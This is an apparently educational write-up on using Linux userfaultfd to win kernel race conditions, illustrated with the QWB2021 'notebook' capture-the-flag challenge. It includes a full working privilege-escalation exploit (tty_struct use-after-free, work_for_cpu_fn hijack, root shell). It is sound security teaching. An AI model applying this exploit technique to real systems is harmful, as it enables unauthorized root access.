Using userfaultfd to Create Race Conditions

Overview

Strictly speaking, userfaultfd is not an exploitation technique, but rather a Linux system call. In simple terms, through the userfaultfd mechanism, users can handle page fault exceptions in user mode via a custom page fault handler.

The following diagram illustrates the entire userfaultfd workflow well:

[Figure: userfaultfd.png]

To use userfaultfd, we first create a userfaultfd file descriptor with the userfaultfd system call, register the memory region to be monitored via ioctl (UFFDIO_REGISTER), and start a dedicated polling thread, the uffd monitor, which calls poll() on the descriptor in a loop until a page fault occurs. The workflow then proceeds as follows:

  • When a thread triggers a page fault exception within this memory region (e.g., accessing an anonymous page for the first time), this thread (called the faulting thread) enters the kernel to handle the page fault exception.
  • The kernel calls handle_userfault() to hand it off to userfaultfd for processing.
  • The faulting thread then enters a blocked state, and a uffd_msg is sent to the monitor thread, waiting for it to finish processing.
  • The monitor thread resolves the page fault via ioctl, with the following options:
      • UFFDIO_COPY: Copy user-defined data to the faulting page.
      • UFFDIO_ZEROPAGE: Zero out the faulting page.
      • UFFDIO_WAKE: Used in conjunction with the UFFDIO_COPY_MODE_DONTWAKE and UFFDIO_ZEROPAGE_MODE_DONTWAKE modes of the two options above to implement batch filling.
  • Once the fault has been resolved, the faulting thread is woken up (directly by UFFDIO_COPY or UFFDIO_ZEROPAGE, or by UFFDIO_WAKE if a DONTWAKE mode was used) and continues running.

The above is the entire workflow of the userfaultfd mechanism. This mechanism was originally designed for virtual machine/process migration and similar purposes, but through this mechanism we can control the execution order of processes, thereby greatly increasing the success rate of race condition exploitation. For example, during the following operation:

copy_from_user(kptr, user_buf, size);

If the thread is preempted after entering the function but before the copy actually begins, and another thread changes the state of the memory block that kptr points to (e.g., by kfree-ing it), then the copy, once it runs, writes into freed memory and a UAF is achieved. Hitting this window by chance is unlikely. However, if user_buf is an mmap-ed region for which we have registered userfaultfd, the first access to it during the copy raises a page fault, the copying thread blocks inside the kernel, and our monitor thread is notified. The copying thread stays suspended until the monitor resolves the fault, so we can carry out the racing operation in the meantime, which greatly increases the success rate of the race.

Usage

The Linux man page already provides us with a basic usage template for userfaultfd. We only need to make minor modifications to put it into practical use. Below is the author's personal template for registering a userfaultfd monitor for specific memory:

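/* Headers needed by the templates in this section. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <poll.h>
#include <pthread.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <linux/userfaultfd.h>

void err_exit(char *msg)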
{
    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    exit(EXIT_FAILURE);
}

void register_userfaultfd(pthread_t *monitor_thread, void *addr,
                          unsigned long len, void *(*handler)(void*))
{
    long uffd;
    struct uffdio_api uffdio_api;
    struct uffdio_register uffdio_register;
    int s;

    /* Create and enable userfaultfd object */
    uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    if (uffd == -1)
        err_exit("userfaultfd");

    uffdio_api.api = UFFD_API;
    uffdio_api.features = 0;
    if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
        err_exit("ioctl-UFFDIO_API");

    uffdio_register.range.start = (unsigned long) addr;
    uffdio_register.range.len = len;
    uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
    if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
        err_exit("ioctl-UFFDIO_REGISTER");

    s = pthread_create(monitor_thread, NULL, handler, (void *) uffd);
    if (s != 0)
        err_exit("pthread_create");
}

We can directly register userfaultfd for an anonymous mmap memory block through the following operation:

register_userfaultfd(thread, addr, len, handler);

Note the handler implementation. Here the author directly adapted it from the Linux man page with minor modifications. It can be customized according to individual needs:

static char *uffd_src_page = NULL; // the data you want to copy in
static long uffd_src_page_size = 0x1000;

static void *
fault_handler_thread(void *arg)
{
    static struct uffd_msg msg;
    static int fault_cnt = 0;
    long uffd;

    struct uffdio_copy uffdio_copy;
    ssize_t nread;

    uffd = (long) arg;

    for (;;) 
    {
        struct pollfd pollfd;
        int nready;
        pollfd.fd = uffd;
        pollfd.events = POLLIN;
        nready = poll(&pollfd, 1, -1);

        /*
         * Pause point.
         * When poll() returns, a page fault has occurred and the faulting
         * thread is blocked in the kernel.
         * You can insert operations here such as sleep(), for example to wait
         * for another thread to finish reallocating the object before the
         * copy resumes, or just sleep forever :)
         */

        if (nready == -1)
            err_exit("poll");

        nread = read(uffd, &msg, sizeof(msg));

        if (nread == 0)
            err_exit("EOF on userfaultfd!\n");

        if (nread == -1)
            err_exit("read");

        if (msg.event != UFFD_EVENT_PAGEFAULT)
            err_exit("Unexpected event on userfaultfd\n");

        uffdio_copy.src = (unsigned long) uffd_src_page;
        uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address &
                                              ~(uffd_src_page_size - 1);
        uffdio_copy.len = uffd_src_page_size; /* was the undefined `page_size` */
        uffdio_copy.mode = 0;
        uffdio_copy.copy = 0;
        if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
            err_exit("ioctl-UFFDIO_COPY");
    }
}
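
UFFDIO_COPY rejects a destination that is not page-aligned, which is why the handler masks the faulting address before copying. The masking step can be checked on its own with a small helper. This is only a sketch: the name page_base is hypothetical, and the page size is assumed to be a power of two.

```c
#include <assert.h>
#include <stdint.h>

/*
 * Hypothetical helper: round a faulting address down to the start of its page.
 * Assumes page_size is a non-zero power of two (0x1000 in the template above).
 */
static uint64_t page_base(uint64_t fault_addr, uint64_t page_size)
{
    assert(page_size != 0 && (page_size & (page_size - 1)) == 0);

    /* Clearing the low bits is the same operation the handler performs. */
    return fault_addr & ~(page_size - 1);
}
```

For a fault at 0x7f0000001234 with 4 KiB pages, the helper yields 0x7f0000001000, which is the value the handler stores in uffdio_copy.dst.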

Example: QWB2021-notebook

Here we use the notebook challenge from QiangWangBei (QWB) 2021 as an example to explain the use of userfaultfd in race conditions.

Analysis

First, let's look at the startup script:

#!/bin/sh
stty intr ^]
qemu-system-x86_64 \
    -m 64M \
    -kernel bzImage \
    -initrd rootfs.cpio \
    -append "loglevel=3 console=ttyS0 oops=panic panic=1 kaslr" \
    -nographic -net user -net nic -device e1000 \
    -smp cores=2,threads=2 -cpu kvm64,+smep,+smap \
    -monitor /dev/null 2>/dev/null -s

The -append kernel command line sets loglevel=3. It's recommended to remove this option while debugging so that the driver's printk output is visible on the console.

The program flow is relatively simple and the symbols are not stripped, so we won't analyze it here. The main vulnerability in the program is UAF caused by a race condition.

First, let's discuss read-write locks. Their properties are:

  • While a write lock is held, every other attempt to acquire the lock (read or write) blocks.
  • While a read lock is held, attempts to acquire the write lock block, but other readers can still acquire the read lock.

Proper use of read-write locks can ensure thread synchronization while improving program performance. The driver in this challenge acquires a read lock in the noteedit and noteadd operations, and only acquires a write lock in the notedel operation. All other operations have no lock protection. The two read-locked operations actually perform write operations, but they can run concurrently, which makes a race condition vulnerability very likely.

In the noteedit operation, krealloc is called with no restriction on newsize. Moreover, the note pointer is not updated right after the krealloc; a copy_from_user call sits in between. We can therefore pass a newsize of 0 so that krealloc frees the note, then use userfaultfd to stall the thread in copy_from_user so that the note pointer is never updated and keeps pointing to the kfree-ed slab object. The drawback of this approach is that the note's size has already been set to 0, so subsequent read and write operations transfer no data.

However, the add operation has a similar flaw: the size is written before its copy_from_user call. By stalling an add thread there as well, we can set the size back to 0x60.

Therefore, we can achieve the following:

  • Allocate a slab of arbitrary size. Although the add operation limits the size to a maximum of 0x60, we can krealloc a slab of arbitrary size through edit.
  • UAF on a slab of arbitrary size. However, we can only control the first 0x60 bytes of data.

Exploitation

Since the edit function uses copy_from_user(), this provides an opportunity for userfaultfd intervention. We can:

  • Allocate a note of a specific size.
  • Start a new edit thread to free it via krealloc(0), and stall it here using userfaultfd.

At this point, the entry in the notebook array has not been cleared and still points to the freed object. We only need to get that object reallocated as another kernel structure to complete the UAF.

Here we still choose the classic tty_struct to complete the exploitation. Since the challenge provides a heap block reading functionality, we can directly leak the kernel base address through the tty_operations in tty_struct, which is typically initialized to the global variable ptm_unix98_ops or pty_unix98_ops.

KASLR shifts the kernel image by a multiple of the page size, so the low 12 bits (the lower three hexadecimal digits) of every kernel address stay the same. We can therefore tell whether the leaked pointer is ptm_unix98_ops or pty_unix98_ops by comparing the lower three hexadecimal digits of the tty_operations address.

Since the challenge provides a heap block writing functionality, we can directly hijack kernel execution flow by modifying tty_struct->tty_operations and then operating on tty (e.g., read, write, ioctl... which will call the corresponding function pointers in the function table). Additionally, notegift() freely gives out the addresses of objects stored in notebook, so we can place the fake tty_operations directly into a note.

However, instead of the traditional approach of constructing a lengthy stack-pivoting ROP chain, we can use a very interesting trick that Chaitin described in their writeup. Quoting the original text:

After controlling rip, the next step is to bypass SMEP and SMAP. Here we introduce a trick that is very useful when you have full control of the tty object: no ROP needed at all, very simple, and very stable (our exploit can successfully escalate privileges, exit the program normally, and even shut down without triggering a kernel panic).

There is such a function in the kernel:

[Image: source code of work_for_cpu_fn()]

After compilation, it roughly looks like this:

[Image: disassembly of the compiled function]

This function is part of the workqueue mechanism implementation. Any kernel with multi-core support enabled (CONFIG_SMP) will contain this function's code. It's easy to notice that this function is very useful: as long as you can control the memory pointed to by the first parameter, you can call any function with one arbitrary argument and store the return value back to the memory pointed to by the first parameter. Moreover, this "gadget" returns cleanly, and you don't need to worry about SMAP or SMEP during execution at all. Since the first parameter of many kernel read / write / ioctl implementations also happens to be the corresponding object itself, it is very well-suited for this scenario. Considering that all we need to do for privilege escalation is commit_creds(prepare_kernel_cred(0)), this can be achieved with just two invocations of the above function call primitive. (If you also need to disable SELinux or similar, just find an arbitrary address write-0 gadget, which is easy to find.)

Using this primitive makes arbitrary function execution relatively easy.
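
To make the primitive concrete, here is a user-space model of it. It is a sketch under stated assumptions, not kernel code: the struct and function names are hypothetical, and the 0x20-byte size of the embedded work item is inferred from the exploit below, which places the function pointer, argument, and result in 8-byte slots [4], [5], and [6] of the tty_struct.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical user-space stand-in for the object the gadget operates on. */
struct model_work_for_cpu {
    uint8_t work[0x20];   /* placeholder for the embedded work item (assumed size) */
    long  (*fn)(void *);  /* slot [4]: function to call */
    void   *arg;          /* slot [5]: its single argument */
    long    ret;          /* slot [6]: where the return value is stored */
};

/* Same shape as the gadget: call fn(arg) and store the result in the object. */
static void model_work_for_cpu_fn(void *first_param)
{
    struct model_work_for_cpu *wfc = first_param;

    assert(wfc->fn != NULL);
    wfc->ret = wfc->fn(wfc->arg);
}

/* Hypothetical target standing in for prepare_kernel_cred() or commit_creds(). */
static long model_target(void *arg)
{
    return (long)(uintptr_t)arg + 1;
}
```

In the exploit, the first call uses prepare_kernel_cred with a NULL argument, the result is read back from slot [6], and the second call passes it to commit_creds. The model mirrors that pattern: fill in fn and arg, invoke the function on the object, then read ret.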

During exploitation, we also need to pay attention to two points:

  • Since the challenge environment has multiple CPU cores, we should use sched_setaffinity() to bind the process to a specific core to ensure the stability of kernel object allocation without needing heap spraying.
  • The tty_struct structure has also been corrupted by us, so after completing privilege escalation, we should restore its contents to the original state.

exp

The final stable privilege escalation exploit is as follows:

/**
 * Copyright (c) 2021 arttnba3 <arttnba@gmail.com>
 * 
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
**/

#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <pthread.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <stdint.h>
#include <poll.h>

/**
 * Kernel Pwn Infrastructure
**/

size_t kernel_base = 0xffffffff81000000, kernel_offset = 0;

void err_exit(char *msg)
{
    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    exit(EXIT_FAILURE);
}

/* root checker and shell popper */
void get_root_shell(void)
{
    if(getuid()) {
        puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
        exit(EXIT_FAILURE);
    }

    puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
    puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");

    system("/bin/sh");

    /* to exit the process normally, instead of segmentation fault */
    exit(EXIT_SUCCESS);
}

/* userspace status saver (Intel-syntax inline asm, build with -masm=intel) */
size_t user_cs, user_ss, user_rflags, user_sp;

void save_status()
{
    asm volatile(
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
    );

    puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

/* bind the process to specific core */
void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf("\033[34m\033[1m[*] Process bound to core \033[0m%d\n", core);
}

/**
 * Kernel structure
**/

struct file;
struct file_operations;
struct tty_struct;
struct tty_driver;
struct serial_icounter_struct;
struct ktermios;
struct termiox;
struct seq_file;

struct tty_operations {
    struct tty_struct * (*lookup)(struct tty_driver *driver,
            struct file *filp, int idx);
    int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
    void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
    int  (*open)(struct tty_struct * tty, struct file * filp);
    void (*close)(struct tty_struct * tty, struct file * filp);
    void (*shutdown)(struct tty_struct *tty);
    void (*cleanup)(struct tty_struct *tty);
    int  (*write)(struct tty_struct * tty,
              const unsigned char *buf, int count);
    int  (*put_char)(struct tty_struct *tty, unsigned char ch);
    void (*flush_chars)(struct tty_struct *tty);
    int  (*write_room)(struct tty_struct *tty);
    int  (*chars_in_buffer)(struct tty_struct *tty);
    int  (*ioctl)(struct tty_struct *tty,
            unsigned int cmd, unsigned long arg);
    long (*compat_ioctl)(struct tty_struct *tty,
                 unsigned int cmd, unsigned long arg);
    void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
    void (*throttle)(struct tty_struct * tty);
    void (*unthrottle)(struct tty_struct * tty);
    void (*stop)(struct tty_struct *tty);
    void (*start)(struct tty_struct *tty);
    void (*hangup)(struct tty_struct *tty);
    int (*break_ctl)(struct tty_struct *tty, int state);
    void (*flush_buffer)(struct tty_struct *tty);
    void (*set_ldisc)(struct tty_struct *tty);
    void (*wait_until_sent)(struct tty_struct *tty, int timeout);
    void (*send_xchar)(struct tty_struct *tty, char ch);
    int (*tiocmget)(struct tty_struct *tty);
    int (*tiocmset)(struct tty_struct *tty,
            unsigned int set, unsigned int clear);
    int (*resize)(struct tty_struct *tty, struct winsize *ws);
    int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);
    int (*get_icount)(struct tty_struct *tty,
                struct serial_icounter_struct *icount);
    void (*show_fdinfo)(struct tty_struct *tty, struct seq_file *m);
#ifdef CONFIG_CONSOLE_POLL
    int (*poll_init)(struct tty_driver *driver, int line, char *options);
    int (*poll_get_char)(struct tty_driver *driver, int line);
    void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
#endif
    const struct file_operations *proc_fops;
};

/**
 * kernel-related numerical values
**/

#define TTY_STRUCT_SIZE 0x2e0

#define PTM_UNIX98_OPS 0xffffffff81e8e440
#define PTY_UNIX98_OPS 0xffffffff81e8e320
#define COMMIT_CREDS 0xffffffff810a9b40
#define PREPARE_KERNEL_CRED 0xffffffff810a9ef0
#define WORK_FOR_CPU_FN 0xffffffff8109eb90

/**
 * Syscall userfaultfd() operator
**/
#define UFFD_API ((uint64_t)0xAA)
#define _UFFDIO_REGISTER        (0x00)
#define _UFFDIO_COPY            (0x03)
#define _UFFDIO_API         (0x3F)

/* userfaultfd ioctl ids */
#define UFFDIO 0xAA
#define UFFDIO_API      _IOWR(UFFDIO, _UFFDIO_API,  \
                      struct uffdio_api)
#define UFFDIO_REGISTER     _IOWR(UFFDIO, _UFFDIO_REGISTER, \
                      struct uffdio_register)
#define UFFDIO_COPY     _IOWR(UFFDIO, _UFFDIO_COPY, \
                      struct uffdio_copy)

/* read() structure */
struct uffd_msg {
    uint8_t event;

    uint8_t reserved1;
    uint16_t    reserved2;
    uint32_t    reserved3;

    union {
        struct {
            uint64_t    flags;
            uint64_t    address;
            union {
                uint32_t ptid;
            } feat;
        } pagefault;

        struct {
            uint32_t    ufd;
        } fork;

        struct {
            uint64_t    from;
            uint64_t    to;
            uint64_t    len;
        } remap;

        struct {
            uint64_t    start;
            uint64_t    end;
        } remove;

        struct {
            /* unused reserved fields */
            uint64_t    reserved1;
            uint64_t    reserved2;
            uint64_t    reserved3;
        } reserved;
    } arg;
} __attribute__((packed));

#define UFFD_EVENT_PAGEFAULT    0x12

struct uffdio_api {
    uint64_t api;
    uint64_t features;
    uint64_t ioctls;
};

struct uffdio_range {
    uint64_t start;
    uint64_t len;
};

struct uffdio_register {
    struct uffdio_range range;
#define UFFDIO_REGISTER_MODE_MISSING    ((uint64_t)1<<0)
#define UFFDIO_REGISTER_MODE_WP     ((uint64_t)1<<1)
    uint64_t mode;
    uint64_t ioctls;
};


struct uffdio_copy {
    uint64_t dst;
    uint64_t src;
    uint64_t len;
#define UFFDIO_COPY_MODE_DONTWAKE       ((uint64_t)1<<0)
    uint64_t mode;
    int64_t copy;
};

char temp_page_for_stuck[0x1000];

void register_userfaultfd(pthread_t *monitor_thread, void *addr,
                          unsigned long len, void *(*handler)(void*))
{
    long uffd;
    struct uffdio_api uffdio_api;
    struct uffdio_register uffdio_register;
    int s;

    /* Create and enable userfaultfd object */
    uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    if (uffd == -1) {
        err_exit("userfaultfd");
    }

    uffdio_api.api = UFFD_API;
    uffdio_api.features = 0;
    if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1) {
        err_exit("ioctl-UFFDIO_API");
    }

    uffdio_register.range.start = (unsigned long) addr;
    uffdio_register.range.len = len;
    uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
    if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1) {
        err_exit("ioctl-UFFDIO_REGISTER");
    }

    s = pthread_create(monitor_thread, NULL, handler, (void *) uffd);
    if (s != 0) {
        err_exit("pthread_create");
    }
}

void *uffd_handler_for_stucking_thread(void *args)
{
    struct uffd_msg msg;
    int fault_cnt = 0;
    long uffd;

    struct uffdio_copy uffdio_copy;
    ssize_t nread;

    uffd = (long) args;

    for (;;) {
        struct pollfd pollfd;
        int nready;
        pollfd.fd = uffd;
        pollfd.events = POLLIN;
        nready = poll(&pollfd, 1, -1);

        if (nready == -1) {
            err_exit("poll");
        }

        nread = read(uffd, &msg, sizeof(msg));

        /* simply staying stuck here is enough: the faulting thread never resumes */
        sleep(100000000);

        if (nread == 0) {
            err_exit("EOF on userfaultfd!\n");
        }

        if (nread == -1) {
            err_exit("read");
        }

        if (msg.event != UFFD_EVENT_PAGEFAULT) {
            err_exit("Unexpected event on userfaultfd\n");
        }

        uffdio_copy.src = (unsigned long long) temp_page_for_stuck;
        uffdio_copy.dst = (unsigned long long) msg.arg.pagefault.address &
                                                    ~(0x1000 - 1);
        uffdio_copy.len = 0x1000;
        uffdio_copy.mode = 0;
        uffdio_copy.copy = 0;
        if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
            err_exit("ioctl-UFFDIO_COPY");
        }

        return NULL;
    }
}

void register_userfaultfd_for_thread_stucking(pthread_t *monitor_thread, 
                                          void *buf, unsigned long len)
{
    register_userfaultfd(monitor_thread, buf, len, 
                         uffd_handler_for_stucking_thread);
}

/**
 * Challenge interactor
**/

#define NOTE_NUM 0x10

struct note {
    size_t idx;
    size_t size;
    char * buf;
};

struct knotebook {
    void *ptr;
    size_t size;
};

int note_fd;
sem_t evil_add_sem, evil_edit_sem;
char *uffd_buf;
char temp_page[0x1000] = { "arttnba3" };

void note_add(size_t idx, size_t size, char * buf)
{
    struct note note = {
        .idx = idx,
        .size = size,
        .buf = buf,
    };

    ioctl(note_fd, 0x100, &note);
}

void note_del(size_t idx)
{
    struct note note = {
        .idx = idx,
    };

    ioctl(note_fd, 0x200, &note);
}

void note_edit(size_t idx, size_t size, char * buf)
{
    struct note note = {
        .idx = idx,
        .size = size,
        .buf = buf,
    };

    ioctl(note_fd, 0x300, &note);
}

void note_gift(void *buf)
{
    struct note note = {
        .buf = buf,
    };

    ioctl(note_fd, 100, &note);
}

ssize_t note_read(int idx, void *buf)
{
    return read(note_fd, buf, idx);
}

ssize_t note_wriite(int idx, void *buf)
{
    return write(note_fd, buf, idx);
}

/**
 * Exploit stage
**/

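/* Stalls inside noteadd()'s copy_from_user() after the size has been set to 0x60. */
void* fix_size_by_add(void *args)
{
    sem_wait(&evil_add_sem);
    note_add(0, 0x60, uffd_buf);
    return NULL;
}

/* Stalls inside noteedit()'s copy_from_user() after krealloc(0) freed the note. */
void* construct_uaf(void * args)
{
    sem_wait(&evil_edit_sem);
    note_edit(0, 0, uffd_buf);
    return NULL;
}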

void exploit()
{
    struct knotebook kernel_notebook[NOTE_NUM];
    struct tty_operations fake_tty_ops;
    pthread_t uffd_monitor_thread, add_fix_size_thread, edit_uaf_thread;
    size_t fake_tty_struct_data[0x100], tty_ops, orig_tty_struct_data[0x100];
    size_t tty_struct_addr, fake_tty_ops_addr;
    int tty_fd;

    /* fundamental infrastructure */
    save_status();
    bind_core(0);

    sem_init(&evil_add_sem, 0, 0);
    sem_init(&evil_edit_sem, 0, 0);

    /* open dev */
    note_fd = open("/dev/notebook", O_RDWR);
    if (note_fd < 0) {
        err_exit("failed to open /dev/notebook!");
    }

    /* register userfaultfd */
    puts("[*] register userfaultfd...");

    uffd_buf = (char *) mmap(
        NULL,
        0x1000,
        PROT_READ | PROT_WRITE, 
        MAP_PRIVATE | MAP_ANONYMOUS,
        -1,
        0
    );
    register_userfaultfd_for_thread_stucking(
        &uffd_monitor_thread,
        uffd_buf,
        0x1000
    );

    /* get a tty-size object */
    puts("[*] allocating tty_struct-size object...");

    note_add(0, 0x10, "arttnba3rat3bant");
    note_edit(0, TTY_STRUCT_SIZE, temp_page);

    /**
     * construct UAF by userfaultfd.
     * Note that we need to sleep(1) here to wait for the kfree() to be done,
     * so that the freed object can be allocated again later.
    */
    puts("[*] constructing UAF on tty_struct...");

    pthread_create(&edit_uaf_thread, NULL, construct_uaf, NULL);
    pthread_create(&add_fix_size_thread, NULL, fix_size_by_add, NULL);

    sem_post(&evil_edit_sem);
    sleep(1);

    /**
     * fix notebook[0]->size.
     * Note that we need to sleep(1) here to wait for the `size` to be fixed.
    */
    sem_post(&evil_add_sem);
    sleep(1);

    /* leak kernel_base by tty_struct */
    puts("[*] leaking kernel_base by tty_struct");

    tty_fd = open("/dev/ptmx", O_RDWR| O_NOCTTY);
    note_read(0, orig_tty_struct_data);

    if (*(int*) orig_tty_struct_data != 0x5401) {
        err_exit("failed to hit the tty_struct!");
    }

    tty_ops = orig_tty_struct_data[3];
    kernel_offset = (tty_ops & 0xfff) == (PTY_UNIX98_OPS & 0xfff) 
                    ? (tty_ops - PTY_UNIX98_OPS)
                    : tty_ops - PTM_UNIX98_OPS;
    kernel_base += kernel_offset;
    printf("\033[34m\033[1m[*] Kernel offset: \033[0m0x%lx\n", kernel_offset);
    printf("\033[32m\033[1m[+] Kernel base: \033[0m0x%lx\n", kernel_base);

    /* construct fake tty_ops */
    puts("[*] construct fake tty_operations...");

    fake_tty_ops.ioctl = (void*) (kernel_offset + WORK_FOR_CPU_FN);
    note_add(1, 0x50, temp_page);
    note_edit(1, sizeof(struct tty_operations), temp_page);
    note_wriite(1, &fake_tty_ops);

    /* get kernel addr of tty_struct and tty_ops by gift */
    puts("[*] leaking kernel heap addr by gift...");

    note_gift(&kernel_notebook);
    tty_struct_addr = (size_t) kernel_notebook[0].ptr;
    fake_tty_ops_addr = (size_t) kernel_notebook[1].ptr;

    printf("[+] tty_struct at 0x%lx\n", tty_struct_addr);
    printf("[+] fake_tty_ops at 0x%lx\n", fake_tty_ops_addr);

    /* prepare_kernel_cred(NULL) */
    puts("[*] trigger commit_creds(prepare_kernel_cred(NULL)) and fix tty...");

    memcpy(fake_tty_struct_data, orig_tty_struct_data, 0x2e0);
    fake_tty_struct_data[3] = fake_tty_ops_addr;
    fake_tty_struct_data[4] = kernel_offset + PREPARE_KERNEL_CRED;
    fake_tty_struct_data[5] = (size_t) NULL;

    note_wriite(0, fake_tty_struct_data);

    ioctl(tty_fd, 233, 233);

    /* commit_creds(&root_cred) */
    note_read(0, fake_tty_struct_data);
    fake_tty_struct_data[4] = kernel_offset + COMMIT_CREDS;
    fake_tty_struct_data[5] = fake_tty_struct_data[6];
    fake_tty_struct_data[6] = orig_tty_struct_data[6];

    note_wriite(0, fake_tty_struct_data);

    ioctl(tty_fd, 233, 233);

    /* fix tty_struct */
    memcpy(fake_tty_struct_data, orig_tty_struct_data, 0x2e0);
    note_wriite(0, fake_tty_struct_data);

    /* pop root shell */
    get_root_shell();
}

int main(int argc, char **argv, char **envp)
{
    exploit();
    return 0;
}

Newer Kernel Versions Countering userfaultfd in Race Condition Exploitation

As the saying goes, "there is no silver bullet." You may find that in newer kernel versions, the userfaultfd system call fails to start successfully:

[Image: uffd_failed]

This is because newer kernel versions changed the default value of the variable sysctl_unprivileged_userfaultfd:

From linux-5.11 source code fs/userfaultfd.c:

int sysctl_unprivileged_userfaultfd __read_mostly;
//...
SYSCALL_DEFINE1(userfaultfd, int, flags)
{
    struct userfaultfd_ctx *ctx;
    int fd;

    if (!sysctl_unprivileged_userfaultfd &&
        (flags & UFFD_USER_MODE_ONLY) == 0 &&
        !capable(CAP_SYS_PTRACE)) {
        printk_once(KERN_WARNING "uffd: Set unprivileged_userfaultfd "
            "sysctl knob to 1 if kernel faults must be handled "
            "without obtaining CAP_SYS_PTRACE capability\n");
        return -EPERM;
    }
//...

From linux-5.4 source code fs/userfaultfd.c:

int sysctl_unprivileged_userfaultfd __read_mostly = 1;
//...

In previous versions, the variable sysctl_unprivileged_userfaultfd was initialized to 1, while in newer kernel versions this variable is not given an initial value, so the compiler places it in the bss segment with a default value of 0.
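
The effect of the linux-5.11 condition quoted above can be modelled as a pure function. This is a sketch for reasoning about the check, not kernel code: the function and macro names are hypothetical, and the flag value 1 is assumed to match UFFD_USER_MODE_ONLY in the kernel's UAPI header.

```c
#include <assert.h>
#include <stdbool.h>

/* Assumed to equal UFFD_USER_MODE_ONLY from <linux/userfaultfd.h>. */
#define MODEL_UFFD_USER_MODE_ONLY 1

/*
 * Hypothetical model of the permission check in the 5.11 syscall entry.
 * Returns true when the call would get past the -EPERM branch.
 */
static bool model_uffd_permitted(int sysctl_unprivileged, int flags,
                                 bool has_cap_sys_ptrace)
{
    assert(sysctl_unprivileged == 0 || sysctl_unprivileged == 1);

    bool denied = !sysctl_unprivileged &&
                  (flags & MODEL_UFFD_USER_MODE_ONLY) == 0 &&
                  !has_cap_sys_ptrace;

    return !denied;
}
```

With the default sysctl value of 0, a call with flags O_CLOEXEC | O_NONBLOCK from an unprivileged process, as in the template earlier in this article, falls into the denied case.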

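This means that on newer kernels an unprivileged process can no longer create a userfaultfd that handles faults raised in kernel mode. The call only succeeds if the sysctl knob is set to 1, the caller has CAP_SYS_PTRACE, or the UFFD_USER_MODE_ONLY flag is passed, and in the last case faults triggered by the kernel itself (such as those in copy_from_user) cannot be handled, so the stalling trick no longer works. This perhaps indicates that userfaultfd, which had only just come into public view, may gradually fade from it again. Still, it is undeniable that userfaultfd gave us a new approach and an extremely stable technique for exploiting race conditions in the Linux kernel.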
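
Before relying on userfaultfd in an exploit, it can be worth checking how the target is configured. The knob is exposed as /proc/sys/vm/unprivileged_userfaultfd on kernels that have it. The helper below is a minimal sketch with a hypothetical name; it returns -1 when the file is missing or unreadable.

```c
#include <assert.h>
#include <stdio.h>

/*
 * Hypothetical helper: return the integer stored in a sysctl file,
 * or -1 if the file cannot be opened or parsed.
 */
static int read_sysctl_int(const char *path)
{
    assert(path != NULL);

    FILE *f = fopen(path, "r");
    if (f == NULL)
        return -1;

    int value = -1;
    if (fscanf(f, "%d", &value) != 1)
        value = -1;

    fclose(f);
    return value;
}
```

Calling read_sysctl_int("/proc/sys/vm/unprivileged_userfaultfd") and getting 0 means the template above will fail with EPERM for an unprivileged user, while 1 means it should still work.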
